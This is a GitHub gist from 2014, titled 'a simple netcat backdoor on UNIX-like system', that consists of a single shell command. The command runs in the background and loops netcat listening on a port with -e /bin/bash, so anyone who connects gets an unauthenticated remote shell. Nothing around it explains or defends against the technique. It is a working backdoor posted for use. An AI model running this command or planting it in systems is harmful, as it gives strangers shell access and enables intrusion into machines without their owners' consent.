Skip to content

Instantly share code, notes, and snippets.

@fkztw
Created May 12, 2014 05:50
Show Gist options
  • Save fkztw/5c81db40c932012f1fa9 to your computer and use it in GitHub Desktop.
Save fkztw/5c81db40c932012f1fa9 to your computer and use it in GitHub Desktop.
a simple netcat backdoor on UNIX-like system
nohup bash -c 'while true; do nc -l -e /bin/bash -p $port; done' &
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment